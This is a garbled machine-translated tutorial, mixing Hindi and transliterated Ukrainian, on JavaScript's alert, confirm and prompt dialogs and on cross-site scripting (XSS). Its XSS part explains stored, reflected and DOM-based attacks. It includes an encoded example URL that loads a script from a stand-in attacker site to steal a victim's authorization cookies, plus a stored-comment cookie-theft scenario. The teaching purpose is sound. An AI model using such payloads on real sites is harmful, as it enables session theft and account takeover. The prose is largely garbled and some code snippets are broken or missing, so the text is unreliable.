यह जावास्क्रिप्ट में भी एक संकेत है। जावास्क्रिप्ट - तरीके सतर्क, शीघ्र और पुष्टि करें। गैर-वैध XSS के साथ हमला बट
Tsіy statty mi vivchimo में तीन tsіkavih विधि, और स्वयं विधियाँ चेतावनी (), पुष्टि () और शीघ्र ()... सभी बदबू मारो कोरिस्टुवाच के साथ बातचीत के लिए पदनाम.
सभी तीन विधियाँ विंडो (ब्राउज़र विंडो) पर स्थित हैं। मैं इसे इस तरह सूंघ सकता हूं: window.method_name (); अले, जावास्क्रिप्ट हमें केवल विधि का नाम देकर विंडो पर आपत्ति करने और लिखने और लिखने की अनुमति देता है।
आइए अलर्ट () विधि का उपयोग करें। डेनिश विधि को ब्राउज़र के अंत में निर्दिष्ट के रूप में दिखाया जाना है। यह अंत में सभी पक्षों के शीर्ष पर दिखाई देगा, और जब तक आप ओके बटन नहीं दबाते हैं, तब तक आप बंद नहीं होते हैं।
प्रदर्शन के लिए, vivedemo को अतिरिक्त अलर्ट () विधि से जोड़ा जाएगा
वार टुडे_इस = "सोमवार"; चेतावनी ("आज" + आज_इस);
मध्य विधियों में, हम एक पंक्ति का उपयोग कर सकते हैं, केवल बिना एचटीएमएल टैग iv. यहाँ की बदबू obroblyayutsya नहीं है, बल्कि vivodatsya याक है।
यदि एक पंक्ति, यदि आप इसे करना चाहते हैं, यदि आप एक नई पंक्ति में जाना चाहते हैं, तो यहां html टैग है
नहीं spratsyuє. यहां आपको "\ n" वर्ण चुनना होगा।
अलर्ट ("लूओउउओंग \ nStringgggggggg");
डेनिश पद्धति अक्सर विजयी होती है मजाक के लिए कोड में क्षमा करें.
कोड को संसाधित करने की प्रक्रिया ऊपर से नीचे तक जाती है, इसलिए क्षमा को पकड़ने के लिए, लंबित क्षेत्र में केवल चेतावनी () विधि लिखें, जहां क्षमा मिलती है। मुझे सतर्क () स्प्रेत्सुवव पसंद है, मतलब एक पंक्ति तक, कोई वर्तनी नहीं है, कोई दया नहीं है।
दाल, इसे एक पंक्ति या अधिक नीचे स्थानांतरित करना आवश्यक है। Zberigaєmo पलकें झपकाता है, मुझे ब्राउज़र में नया पृष्ठ पता है, और आश्चर्य है, अगर सतर्क () spratsyuvav, अर्थ, पंक्ति के लिए क्षमा, वहाँ होने का कोई संकेत नहीं है, नहीं, इनशोमु विपद में, यदि यह स्प्रेत्सुवव नहीं है, तो धूमधाम एक पंक्ति में है, एक बार पेरेबुवाє... रैंक की ऐसी धुरी को कोड में क्षमा के रूप में पहचाना जा सकता है।
पुष्टि () विधि
जानकारी की पुष्टि के लिए, पोषण के लिए पूरी विधि विजयी है। केवल दो विकल्प दिखाई देते हैं, वह (ओके) ची नी (रद्द करें / स्कासुवती)। यदि उत्तर सही है, तो विधि को सही (सत्य) में घुमाया जाता है, और विधि बॉक्स (गलत) को घुमाने के लिए होती है।
बट के लिए, अतिरिक्त पुष्टि () विधि के अंत में विवेडेमो, "क्या आप वास्तव में पक्ष को ओवरराइड करना चाहते हैं?" यदि आप ऐसा कहते हैं, तो अलर्ट () विधि के माध्यम से आपको "कोरिस्टुवाच पक्ष छोड़ना चाहता है" संदेश भी दिखाई देगा, और दूसरी बार आप देखेंगे "कोरिस्टुवाच पक्ष छोड़ना नहीं चाहता"।
Var user_answer = पुष्टि करें ("क्या आप वाकई पृष्ठ को अधिलेखित करना चाहते हैं?"); अगर (user_answer) अलर्ट ("कोरिस्टुवाच पेज छोड़ना चाहेगा"); अन्य चेतावनी ("कोरिस्टुवाच \ n पक्ष नहीं छोड़ना चाहता");
तो रैंक की धुरी पुष्टि () विधि है। विन विकोरिस्टोवुवत्स्य विभिन्न व्यपदियों में कर सकते हैं। उदाहरण के लिए, साइट से देखे जाने से पहले, इसे एक कोरिस्टुवाच को खिलाने के लिए लिया गया था, जो अपनी ही लड़की का दोषी था। लेकिन इससे पहले कि आप फॉर्म बदलते हैं, आप कोरीस्टुवाच को भी खिला सकते हैं "क्या आपको सब कुछ ठीक से याद है?"
शीघ्र () विधि
पहली स्टॉप विधि, जो वैकल्पिक है, प्रॉम्प्ट () विधि है। डेनिश विधि विजयी है, लेकिन नीचे दो विधियाँ हैं। जैसे ही आप इसे टेक्स्ट फ़ील्ड में दर्ज करते हैं, वीन आपको कोरिस्टुवाच के बारे में जानकारी को सही करने की अनुमति देता है।
नतीजतन, प्रॉम्प्ट () विधि घुमाएगी या तो मैं एक पंक्ति में प्रवेश करूंगा, अगर मैं ओके बटन दबाता हूं, या नल, अगर मैं ओके बटन दबाता हूं।
यह एक पैरामीटर है, ताकि किसी दी गई विधि के सभी मध्य धनुषों को एक पंक्ति, या आपूर्ति में लिखा जा सके, यदि आप जानकारी जानते हैं, तो आपको इसे दर्ज करने की आवश्यकता है।
उदाहरण के लिए, हम कोरिस्टुवाच से भोजन का जवाब देने के लिए कहते हैं "याक आपको बुलाता है?" नाम की मदद से पेश किया जाता है, यह सहायक चेतावनी () विधि के पीछे स्क्रीन पर प्रदर्शित होता है।
वर नाम = प्रांप्ट ("मैं आपको कैसे कॉल कर सकता हूं?"); चेतावनी ("आपको कॉल करें" + नाम);
Zberigaєmo और ब्राउज़र में लिंक प्रदर्शित करना।
जाहिर है, टेक्स्ट फ़ील्ड में प्रॉम्प्ट () विधि के साथ, आप कोई भी जानकारी दर्ज कर सकते हैं। संख्याओं या कुछ विशेष वर्णों के समय में नेविगेट करने के लिए जानकारी को एक पंक्ति की तरह घुमाया जाएगा।
बट के लिए, हम कोरिस्टुवाच को दो नंबर दर्ज करने के लिए कहते हैं, फिर हम उन्हें गुणा कर सकते हैं। कई नंबरों के लिए कैलकुलेटर होगा।
Var x = प्रांप्ट ("पहला नंबर दर्ज करें:"); var y = प्रॉम्प्ट ("दूसरा नंबर दर्ज करें:"); // एक स्ट्रिंग प्रकार से एक संख्यात्मक प्रकार x = संख्या (x) में इनपुट संख्याओं को फिर से लिखना; वाई = संख्या (वाई); दस्तावेज़.लिखें (x + "*" + y + "=" + (x * y));
पंक्तियों में संख्याओं को दर्ज करना, इसलिए सही परिणाम को गुणा करने के लिए, आपको संख्या () फ़ंक्शन के माध्यम से संख्या को पारित करने की आवश्यकता है, क्योंकि यह संख्या को स्ट्रिंग प्रकार से सामान्य संख्याओं में परिवर्तित करता है।
अच्छा यही सब है। अब हम तीन तरीके जानते हैं: चेतावनी (), पुष्टि करें () शीघ्र है ()... आप अभ्यास पर vikoristovuvati मुस्कुरा सकते हैं।
जावास्क्रिप्ट में, तीन हैं बुनियादी संचालन, याकी आपको स्क्रिप्ट में शेष प्रसंस्करण के लिए कोरिस्टुवाच से डेटा को ट्रिम करने की अनुमति देता है। त्से अलर्ट, शीघ्र पुष्टि करें। क्यों बदबू स्थिर है, क्योंकि यह vikoristovuvati और बारीकियों है और प्रतिमा में दूर तक पहचाना जाएगा।
चेतावनी
ब्राउज़र स्क्रीन पर एक मोडल विंडो प्रदर्शित करने के लिए अटका हुआ है (इसका मतलब है कि कुछ भी नहीं खींचा जा सकता है, जब तक कि यह रो नहीं रहा है। खुले बट पर, चुपचाप, ओके बटन को छोड़ दें) खिड़की पर।
जब संदेश प्रदर्शित होता है, तो संदेश अलर्ट में प्रदर्शित होता है, स्क्रिप्ट प्रदर्शित होती है और मोडल विंडो बंद होने पर अपडेट की जाती है।
कभी-कभी zapovnennyaफ़ील्ड्स ऑनस्लॉट ओके, स्क्रिप्ट टर्न इंफॉर्मेशन में, yaku vіv koristuvach।
कमांड सिंटैक्सकभी-कभी यह मुड़ा हुआ होता है, सामने से कम होता है, और कुछ टुकड़े आपको कोरिस्टुवाच से पहले जानवर के पाठ और जानकारी दर्ज करने के लिए क्षेत्र की सामग्री में प्रवेश करने की अनुमति देते हैं, यदि आपसे सुझाव मांगे जाएंगे: परिणाम = शीघ्र (शीर्षक, डिफ़ॉल्ट);, डे
- शीर्षक- वास्तव में, कोरिस्टुवाचेव को मोडल विंडो में पेश किया जाएगा। तर्क zapovneya के लिए बाध्यकारी है।
- चूक जाना- फिर, परिवर्तन के लिए पाठ की शुरूआत के लिए क्षेत्र में scho videdetsya। यह भंडारण के लिए भी बाध्यकारी है, यदि आप इसे नहीं डाल सकते हैं, तो आप इसे deyaky ब्राउज़रों में क्षमा के लिए ला सकते हैं। यदि आप खाली जानकारी दर्ज करने के लिए क्षेत्र छोड़ना चाहते हैं, तो बस अगली रैंक के साथ शीघ्र पूछें:
var myTest = शीघ्र ("बी-याक जानकारी", "" ");
छोटा बट vikoristannya शीघ्र:
वर वर्ष = शीघ्र ( "आपने वीएनजेड कैसे समाप्त किया?", 2008); चेतावनी ("वी विपुस्कनिक" + वर्ष + "रॉक!");
Zazvychay ने vikoristovutsya को koristuvachiv से श्रद्धांजलि एकत्र करने का आदेश दिया, क्योंकि अन्य रोबोटों की उन्नति के लिए स्क्रिप्ट आवश्यक है।
पुष्टि करना
इसके अलावा मोडल vіkno... याक के लिए uzgodzhennya chogos z koristuvach के लिए vikoristovutsya zzvychay नाम पूछना आसान नहीं है।
इस उद्देश्य के लिए, इसे तेज किया जाता है - OK और CANCEL बटनों के आदान-प्रदान के लिए, क्रमशः स्क्रिप्ट बूलियन मानों को सही और गलत करने के लिए।
दिन के अंत में आप तरीकों से सीख सकते हैं ओब'एक्टा विंडो: अलर्ट (), शीघ्र () की पुष्टि है ()।
चेतावनी () विधि
स्क्रीन पर सतर्क संवाद विंडो प्रदर्शित करने के लिए मूल्यों की चेतावनी () विधि, क्योंकि हम इसे "ओके" बटन पर असाइन करेंगे। कोरिस्टुवाच को महत्वपूर्ण जानकारी देने के लिए आप vikoristovuvatisya कर सकते हैं।
विंडो.अलर्ट (पैरामीटर_1);
अलर्ट () विधि में एक बाध्यकारी पैरामीटर है - संदेश पाठ जो संवाद विंडो में प्रदर्शित होता है। इसके विकोनन्न्या के परिणामस्वरूप डेनिश पद्धति को उलट नहीं किया गया है।
उदाहरण के लिए, एक साइट के लिए एक vivedemo एक poperezhuvala संवाद vіkno पर हमले के साथ: साइट पर जाएँ
पुष्टि करें () विधि
संवाद बॉक्स की स्क्रीन पर संवाद बॉक्स प्रदर्शित करने के लिए मानों की विंडो सेट करने की पुष्टि () विधि, जिस क्षण से इसे "ओके" और "स्कासुवती" बटन के साथ सौंपा गया है। यदि आप पुष्टि के लिए पूछ सकते हैं, तो आप इस दिन की पुष्टि के लिए कॉलिस्टुवाच को कॉल करने के लिए कह सकते हैं।var परिणामपुष्टि करें = पुष्टि करें (पैरामीटर_1);
डेनिश पद्धति का एक पैरामीटर है - संदेश का संपूर्ण पाठ, जैसा कि संवाद बॉक्स में दिखाया जाएगा।
अपने स्वयं के पुष्टिकरण के परिणाम (resultConfirm) की गुणवत्ता में पुष्टि () विधि को दो मानों में से एक में घुमाया जाता है:
- सच है, अगर आप "ओके" दबाते हैं;
- झूठा, जैसे कि कोरिस्टुवाच ने "स्कासुवन्न्या" को धक्का दिया या योगो को शाप दिया।
उदाहरण के लिए, संवाद विंडो में "ओके" बटन पर क्लिक करके हमले के परिणाम p s id = "resultConfirm" तत्व में vivedemo:
शीघ्र () विधि
डेटा दर्ज करने और "ओके" और "स्कासुवती" बटन का उपयोग करने के लिए एक टेक्स्ट फ़ील्ड के साथ संवाद बॉक्स की स्क्रीन पर संवाद बॉक्स में प्रवेश करने के लिए मूल्यों का संकेत () विधि। वोनो को कोरिस्टुवाच खिलाया जाना है।
var resultPrompt = शीघ्र (पैरामीटर_1, पैरामीटर_2);
डेनिश विधि के दो पैरामीटर हैं:
- कभी-कभी, जैसा कि संवाद विंडो में देखा जाएगा। डेनिश पैरामीटर є बाध्य और बदला लिया जाएगा, जिसमें यह "पाया जाना" है, क्योंकि यह पाठ क्षेत्र में कोरिस्टुवाच दर्ज करने की जिम्मेदारी है;
- अन्य पैरामीटर वैकल्पिक है और इसका उपयोग कोब मान दर्ज करने के लिए किया जा सकता है, क्योंकि यह प्रदर्शन पर दर्ज किए गए संवाद बॉक्स में दर्ज किया जाएगा।
यदि आप शीघ्र () विधि को देखते हैं, तो आप अगली तिथि बदल सकते हैं:
- अर्थ का पाठ - यदि क्षेत्र में डेटा और कोरिस्टुवाच नटिसनुव "ओके" का बदला लेने के लिए प्रवेश किया है;
- खाली पंक्ति - जैसा कि परिचय के क्षेत्र में डेटा से बदला लेने और "ओके" दबाने की कोई आवश्यकता नहीं है;
- अशक्त - कैसे कोरिस्टुवाच नतिसुवाच "स्कासुवन्न्या" या ज़क्रीत्से वेकोनो, जिस पर यह महत्वपूर्ण नहीं है कि डैन बौली ने पाठ क्षेत्र में प्रवेश किया।
नोट: डायलॉग बॉक्स, जैसा कि अलर्ट (), कन्फर्म () मेथड्स, या प्रॉम्प्ट () मोडल में से किसी एक के परिणाम में दिखाई देता है, ताकि यह कोरीस्टुवाच की पहुंच को डैडाटकॉम (ब्राउज़र) तक चुपचाप, पूछें corystuvach vіkno नहीं।
उदाहरण के लिए, तत्व में id = "nameUser" वाला टेक्स्ट:
उदाहरण के लिए, हम संख्या 8 के अनुमान में कोरिस्टुवाच मांगते हैं:
... संख्या का अनुमान लगाएं
मुझे पता है कि मैंने तुम्हें चेरगोविय में लटका दिया है जावास्क्रिप्ट, याकी मि रोज़बेरेमो में तरीके चेतावनी, शीघ्र, पुष्टि... दानी विधियों vbudovanim mov . में जावास्क्रिप्टऔर कोरिस्टुवाच के साथ सहयोग करने में हमारी मदद करें।
चेतावनीब्राउजर स्क्रीन पर गायन की जानकारी के साथ एक विंडो लाने के लिए, जैसा कि ओके बटन दबाने के क्षण तक स्क्रिप्ट को दबाया जाता है।
तत्परएक नियम के रूप में, यह इंगित करना महत्वपूर्ण है कि भोजन किस मामले में सेट किया गया है, जब आप ओके बटन दबाते हैं, तो गायन टेक्स्ट फ़ील्ड का जवाब देने के लिए यह किस गलती के लिए दोषी है। इसी तरह, आपको स्कासुवन्न्या की कुंजी दबाकर कोरिस्टुवाच पेश करने की आवश्यकता नहीं हो सकती है।
पुष्टि करनाइसके अलावा, vіkno दर्ज करें, जिसमें koristuvach आप टेक्स्ट फ़ील्ड में कुछ भी दर्ज नहीं कर सकते हैं, लेकिन आप इसे OK बटन या skasuvannya दबाने से वंचित कर सकते हैं।
और अब, एक छोटे से परिचय के बाद, मैं अभ्यास में कही गई हर बात को देखने जा रहा हूँ।
नतीजतन, जब ब्राउज़र पक्ष अपडेट किया जाता है, तो हम एक विंडो में कोरिस्टुवाच के अभिवादन के साथ दिखाई देंगे। जब ओके बटन दबाया जाता है, तो यह आपकी छवि को फीड करने के लिए तुरंत दिखाई देगा। वी यह विधिदो पैरामीटर, जो बाध्य हैं और शीर्षक के लिए प्रदर्शित किए जाते हैं, जो कि हमारी पसंद के भोजन में शामिल होंगे। पहला अन्य पैरामीटर मान के लिए प्रदर्शित होता है, क्योंकि यह टेक्स्ट फ़ील्ड में सुझावों के लिए प्रदर्शित किया जाएगा। यदि आप अपना नाम दर्ज करते हैं और OK बटन दबाते हैं, तो आपका नाम विंडो में जाएगा नाम उपयोगकर्ता... बटन दबाओगे तो भविष्य में लिखोगे शून्य.
सबसे पहले और सबसे महत्वपूर्ण, यदि आप कोरिस्टुवाच में खाते हैं, यदि आप हमारी साइट ची नी को छोड़ना चाहते हैं। सर्दियों में हर ज़गोडी के लिए तार्किक अर्थ प्रदान किया जाएगा सच, पर vіdmovі झूठापक्का। एक्सिस और सब कुछ, पाठों की शुरुआत तक, इन तरीकों के बारे में बड़प्पन पर जाएं!
क्रॉस-साइट स्क्रिप्टिंग (एक्सएसएस) एक अंतर है, जैसे एम्बेडेड कोड पर एक नज़र, वेब साइड में क्लाइंट के पक्ष (जावास्क्रिप्ट) पर देखने के लिए, जैसे कोड के अंदर देखना।
विजेताओं को फ़िल्टरिंग श्रद्धांजलि की कमी के माध्यम से दूर करना, जिन्हें वेब साइट में डालने के लिए वेब पेज पर भेजा जाता है। किसी विशिष्ट बट पर ज़ूम इन करना आसान है। इसे एक अतिथि पुस्तक के रूप में सोचें - कार्यक्रमों की एक पूरी श्रृंखला, जो एक कोरिस्टुवाच और एक झूठी छवि के दिए गए दृश्य को स्वीकार करने के लिए उपयोग की जाती है। जाहिर है, अतिथि की पुस्तक की कल्पना नहीं की जाती है और न ही फ़िल्टर की जाती है, बल्कि पेश की जाती है, लेकिन बस इसकी कल्पना की जाती है।
आप अपना खुद का फेंक सकते हैं सरलतम लिपि(कोई साधारण बात नहीं है, PHP में गंदी स्क्रिप्ट लिखने की कोई आवश्यकता नहीं है - व्यस्त होने के लिए यह बहुत बड़ा है)। पहले से ही पर्याप्त तैयार विकल्प नहीं हैं। उदाहरण के लिए, मुझे Dojo और OWASP Mutillidae II के बारे में कुछ जानकारी याद आ जाएगी। वहाँ є एक समान बट। डोजो के स्वायत्त मध्य में, अनुमति के लिए ब्राउज़र पर जाएं: http: //localhost/mutilidae/index.php? पेज = ऐड-टू-योर-ब्लॉग.php
कोरिस्टुवाचिव विव से यक्ष्को हटोस:
वे वेब साइड डिस्प्ले:
विटन्या! आपकी साइट के समान।
और आप इस तरह कोरिस्टुवाच में प्रवेश करेंगे:
विटन्या! आपकी साइट के समान।
वे इस तरह दिखाई देते हैं:
ब्राउज़र महान वेबसाइटों से निःशुल्क कुकीज़ सहेजते हैं। त्वचा साइट को स्वयं सहेज कर ही संपादित किया जा सकता है। उदाहरण के लिए, साइट example.com आपके ब्राउज़र में लोड है। यदि आप other.com साइट पर जाते हैं, तो पूरी साइट (क्लाइंट और सर्वर स्क्रिप्ट) का उपयोग कुकीज़ तक पहुंच को संसाधित करने के लिए नहीं किया जा सकता है, जैसे कि example.com साइट।
चूंकि साइट example.com को XSS में फुलाया जाता है, इसका मतलब है कि हम नए जावास्क्रिप्ट कोड में डालने के लिए सबसे कुशल तरीके से कर सकते हैं, और कोड example.com साइट पर प्रदर्शित किया जाएगा! ऐसा करने के लिए, कोड प्रदान किया जाएगा, उदाहरण के लिए, कुकी साइट example.com तक पहुंच।
मुझे लगता है कि सभी को यह याद होगा कि जावास्क्रिप्ट corystuvachiv के ब्राउज़र में उपलब्ध है, ताकि XSS की उपस्थिति के साथ, एक shkidlivy कोड की शुरूआत के साथ, मैं दिए गए corystuvach तक पहुंच से इनकार कर दूंगा, जिसका उपयोग वेबसाइट खोलने के लिए किया जा सकता है।
इसके अलावा, कोड जावास्क्रिप्ट में उन सभी में है, लेकिन स्वयं:
- मैं साइट देखने के लिए कुकीज़ तक पहुंच को अक्षम कर दूंगा
- आप कुछ सांप ला सकते हैं ज़ोव्निश्निय विग्लादबग़ल में
- मैं एक्सचेंज बफर तक पहुंच हटा दूंगा
- आप जावास्क्रिप्ट प्रोग्राम का उपयोग कर सकते हैं, उदाहरण के लिए, कुंजी लॉगर
- बीईईएफ को सुनें
- में है कि।
गुड़िया के लिए उपयोग में आसान बटस्टॉक:
अच्छे कारण के लिए, चेतावनी vikorystovuєtsya केवल XSS का पता लगाने के लिए। बड़ी बात करना वाकई बहुत बड़ी बात है। वॉन को कॉल करने के लिए स्वागत है सर्वर देखेंद्वेषपूर्ण और नई चोरी की श्रद्धांजलि के लिए प्रेषित।
एक्सएसएस देखें
नायगोलोव्निशे, एक्सएसएस को देखने के बारे में क्या कहा जाना चाहिए, यह क्या बदबू आ रही है:
- सहेजें (पोस्ट)
- विदबिट (पोस्ट नहीं)
डाकियों का बट:
- एक सर्वर के रूप में अतिथि पुस्तक (टिप्पणी, मंच, प्रोफ़ाइल पर पोस्ट की गई) द्वारा विशेष संरचनाओं के दुष्ट व्यक्ति द्वारा प्रस्तुत, त्वचा के सर्वर से एक बार लॉग इन करना, अगर यह पार्टी की छवि को शक्ति देगा।
- द्वेषी, उदाहरण के लिए, के माध्यम से सर्वर श्रद्धांजलि तक पहुंच काट रहा है एसक्यूएल में है, vvadv in vidayutsya koristuvachevі danі बुराई JavaScript कोड (s ki-logery or s BeEF)।
गैर-सदा का बट:
- साइट पर एक चुटकुला है, जैसे कि एक ही समय में परिणामों के साथ मजाक आंख को दिखाया गया था "आप मजाक कर रहे थे: [मजाक की पंक्ति]", सभी श्रद्धांजलि के साथ उचित रैंक द्वारा फ़िल्टर नहीं किया जाना चाहिए। Oskіlki ऐसा पक्ष केवल उसी के लिए प्रदर्शित होता है जिसके पास प्रतिक्रिया होती है, फिर, यदि दुष्ट-कर्ता साइट की शक्ति को साइट पर नहीं भेजता है, तो हमला सही नहीं है। पीड़ित की अनुमति के पुनर्निर्देशन को बदलने के लिए, आप एक तटस्थ साइट पर दुर्भावनापूर्ण स्क्रिप्ट पोस्ट करना चुन सकते हैं, जो पीड़ित है।
मैं यह भी देखता हूं (गैर-अवधारणात्मक एक्सएसएस आग्रह के अर्थ में कार्य करता है, देख, साथ ही, एक प्रकार का हो सकता है या एक प्रकार का एक्सएसएस पोस्ट हो सकता है):
- डोम मॉडल
डोम-आधारित एक्सएसएस विशेषताएं
जैसा कि यह कहना आसान है, यह कहना बहुत आसान है कि "असाधारण" गैर-देशी XSS के कार्यक्रम को HTML कोड प्रदर्शित होने पर प्रोग्राम किया जा सकता है। उदाहरण के लिए, पॉसिलन्या निम्न रैंक से बनता है:
Http://example.com/search.php?q= "/>
और जब आउटपुट HTML कोड प्रदर्शित होता है, तो यह इस तरह दिखता है:
और DOM XSS, DOM संरचना को बदल देता है, क्योंकि इसे हाइलाइट किए गए कोड के साथ लाभ और संशोधन के लिए ब्राउज़र में आकार दिया जा सकता है, और केवल जब आप इसे देखते हैं, तो DOM संरचना तैयार की जाती है। एचटीएमएल बिल्कुल नहीं बदलता है। आइए बट के लिए निम्नलिखित कोड जोड़ें:
फिर ब्राउज़रों में यह संभव है:
वापसी कोड:
आइए अगली रैंक द्वारा पता तैयार करें:
एचटीपी: //लोकलहोस्ट/टेस्ट/एक्सएसएस/dom_xss.html#input=tokenAlex;
अब विग्लियाड का किनारा इस प्रकार है:
अले, आइए आउटपुट HTML कोड पर एक नज़र डालें:
बदलने के लिए बिल्कुल कुछ भी नहीं है। जैसा कि मैंने कहा, हमें दस्तावेज़ की DOM संरचना पर आश्चर्य करने की आवश्यकता है, ताकि हम सरल कार्यक्रम देख सकें:
XSS का एक कार्यशील प्रोटोटाइप यहां इंगित किया गया है, वास्तविक हमले के लिए, हमें और अधिक बंधनेवाला विकल्पों की आवश्यकता है, क्योंकि यह उन लोगों के लिए सार्थक नहीं है जो कोमा के छींटे के साथ एक बार में इसे आसानी से नहीं पढ़ते हैं चेतावनी (1); चेतावनी (2)ये अच्छी बात नहीँ हे। विरोध, ज़ावदयाकि अनस्केप ()बदले में, हम श्रद्धांजलि को निम्नलिखित में बदल सकते हैं:
एचटीपी: //लोकलहोस्ट/टेस्ट/एक्सएसएस/dom_xss.html#input=tokenAlex;
डे मील ने प्रतीक को बदल दिया ; यूआरआई एन्कोडिंग समकक्ष पर!
अब हम जावास्क्रिप्ट को अनुकूलित किए बिना और पीड़ित को पुनर्निर्देशित करने के विकल्प का उपयोग किए बिना बहुत सारी स्क्रिप्टिंग लिख सकते हैं, जैसा कि मानक गैर-कार्यात्मक वेबसाइट स्क्रिप्टिंग के लिए किया जाना चाहिए।
एक्सएसएस ऑडिटर
वी गूगल क्रोम(और ओपेरा में भी, जो अब Google Chrome का vikoristovuyu इंजन है), मेरे चेक अक्ष पर ऐसा आश्चर्य:
dom_xss.html: 30 XSS ऑडिटर ने "http: //localhost/tests/XSS/dom_xss.html#input=token में एक स्क्रिप्ट निष्पादित करने से इनकार कर दिया।; "क्योंकि इसका स्रोत कोड अनुरोध के भीतर पाया गया था। ऑडिटर को सक्षम किया गया था क्योंकि सर्वर ने न तो" एक्स-एक्सएसएस-प्रोटेक्शन "और न ही" सामग्री-सुरक्षा-नीति "हेडर भेजा था।
Tobto अब ब्राउज़र є XSS ऑडिटर में है, जो XSS का अधिग्रहण करने में सक्षम होगा। फ़ायरफ़ॉक्स में इस कार्यक्षमता की अधिकता नहीं है, लेकिन मुझे लगता है कि यह सही समय पर सही है। यदि ब्राउज़रों में कार्यान्वयन दूर होगा, तो हम ट्विस्टिंग XSS स्टोरेज के मूल्य के बारे में बात कर सकते हैं।
कोरिसनो पमायताती, स्को आधुनिक ब्राउज़र DOM XSS पर आरोहित गैर-मूल XSS पर समस्याओं के शोषण के रास्ते में लॉग इन और आउट करने के साथ मिलें। इसके अलावा, एक अतिरिक्त ब्राउज़र के लिए वेबसाइटों का परीक्षण करते समय यह याद रखना आवश्यक है - जितना संभव हो, आप देख सकते हैं कि वेब फ़ीड फुलाया गया है, लेकिन केवल कारण को अवरुद्ध करने के कारण भ्रमित ब्राउज़र अनुमोदन से परेशान न हों।
शोषण लागू करें XSS
दुष्ट पुरुष, जो वेबसाइट स्क्रिप्टिंग की बहुमुखी प्रतिभा के बारे में विजयी हो सकते हैं, एक अलग तरीके से बहुमुखी प्रतिभा के त्वचा वर्ग में आने के दोषी हैं। यहाँ त्वचा वर्ग के लिए आक्रमण वैक्टर हैं।
जब XSS को हमलों में इंजेक्ट किया जाता है, तो आप BeEF का उपयोग कर सकते हैं, जो वेबसाइट से हमले को स्थानीय रूप से otochennye koristuvachiv तक फैलाता है।
गैर-वैध XSS के साथ हमला बट
1. अलीसा अक्सर मेजबान बॉब की साइट होती है। बॉब की वेबसाइट ऐलिस को कीस्ट्रोक/पासवर्ड के नाम से साइन इन करने और भुगतान जानकारी जैसे संवेदनशील डेटा का ध्यान रखने की अनुमति देती है। यदि लकड़हारा ठीक है, तो ब्राउज़र ने प्राधिकरण कुकीज़ को सहेज लिया है, क्योंकि ऐसा लगता है कि यह बेज़ग्लुज़्डे प्रतीक है, ताकि कंप्यूटर (क्लाइंट और सर्वर) को अपमानित करने के लिए याद किया जाए, यह चला गया है।
2. मेलोरी का मतलब है कि बॉब की वेबसाइट बदला नहीं है post_ynu XSSपरिवर्तनशीलता:
२.१ जब मजाक का पक्ष प्रदर्शित होता है, तो मजाक के लिए एक पंक्ति दर्ज की जाती है और भेजें बटन पर क्लिक करें, यदि परिणाम ज्ञात नहीं हैं, तो चुटकुलों की एक पंक्ति दर्ज की जाती है, जिसके बाद "ज्ञात नहीं" शब्द आते हैं। http://bobssite.org?q= उसके ध्वनि बिजली की आपूर्ति
२.२ शब्द के लिए सामान्य ध्वनि फ़ीड के साथ " कुत्ते"पृष्ठ बस प्रदर्शित होता है" कुत्ते, ज्ञात नहीं "और url http://bobssite.org?q= कुत्ते, जो पूरी तरह से सामान्य व्यवहार है।
२.३ सुरक्षित करें, अगर एक शोर में एक विषम ध्वनि बिजली की आपूर्ति कंसोल को भेजी जाती है :
2.3.1 जब आप कोई परिवर्तन देखें तो प्रकट हों (जैसे "xss" कहना)।
2.3.2 छवि साइडबार ज्ञात नहीं है"xss" पाठ के साथ क्षमा के बारे में आदेश दिया गया है।
2.3.3 शोषण के लिए यूआरएल संलग्न http://bobssite.org?q=
3. यूआरएल के दोहन के लिए अनुकूलित यूआरएल डिजाइन:
3.1 URL जीता http://bobssite.org?q=puppies ... वॉन परिवर्तनीय कंपन कर सकता है ASCII वर्णसोलह प्रारूप में, ऐसा याकी http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3Eताकि लोगों को पता न चले कि हाइलाइट किए गए URL को गुप्त रूप से कैसे समझा जाए।
3.2 बॉब की साइट के सदस्य के रूप में बॉब की साइट पर ई-मेल नहीं भेजेंगे, ऐसा लगता है: "कूल डॉग्स प्राप्त करें।"
4. अलीसा पत्ता हटा देगी। वॉन को अपने दम पर कुत्तों और क्लैट्स से प्यार है। आप मजाक में बॉब की साइट पर जाते हैं, आप कुछ भी नहीं जानते हैं, "कुत्ते, आप नहीं जानते" वहां दिखाई देते हैं, और बीच में टैग को एक स्क्रिप्ट (स्क्रीन पर अदृश्य) के साथ लॉन्च किया जाता है, जिससे प्रोग्राम अवरुद्ध हो जाता है मेलोरी authstealer.js ... अलीसा ज़बुवा: प्रो त्से।
5. authstealer.js प्रोग्राम, बॉब की वेबसाइट की तरह, Alisi ब्राउज़र में इस तरह चलेगा। मुझे अलीसी की प्राधिकरण कुकीज़ की एक प्रति चाहिए और मेलोरी के सर्वर, डी मेलोरी वाइटागु को अग्रेषित कर दी जाएगी।
7. अब, यदि मेलोरी बनाम है, तो वेबसाइट के भुगतान वितरण में नहीं होगा, आश्चर्य करें और नंबर की एक प्रति चोरी करें क्रेडिट कार्डअलीसी। बस पासवर्ड बदल दें, ताकि अब अलीसा और प्रवेश न कर सके।
8. Vona virіshuє zrobiti आने वाला क्रोक और एक निश्चित रैंक द्वारा स्वयं बॉब के लिए डिज़ाइन किया जाएगा, और इस तरह के रैंक से मैं बॉब की साइट के प्रशासनिक विशेषाधिकार को स्वीकार करूंगा।
स्थायी XSS हमला
- मेलोरी का बॉब की साइट पर एक खाता है।
- एक्सएसएस तात्कालिकता के पद पर बदला लेने के लिए बॉब के लिए वेब साइट के लिए मेलोरी धन्यवाद। यदि आप नए अनुभाग में जाते हैं, तो टिप्पणी बदलें, तो आप इसे नए में नहीं देखेंगे। यदि कमेंट्री के टेक्स्ट को HTML टैग से बदला जाना चाहिए, तो स्क्रिप्ट टैग लॉन्च होने पर टैग प्रदर्शित होंगे।
- मेलोरी ने न्यूज सेक्शन में आर्टिकल पढ़ा और कमेंट सेक्शन में कमेंट लिखें। कमेंट्री में, टेक्स्ट डालें:
- मेरे इतिहास में कुत्तों का इतना सम्मान किया जाता था। इतनी शानदार बदबू!
- अगर अलीसा (वैसे भी, वास्तव में नहीं) एक टिप्पणी के साथ zavantazhuyut पोस्ट, मेलोरी स्क्रिप्ट टैग मेलोरी शुरू करते हैं और संग्रह के लिए गुप्त सर्वर मेलोरी को भेजे गए एलिसा के प्राधिकरण को चुरा लेते हैं।
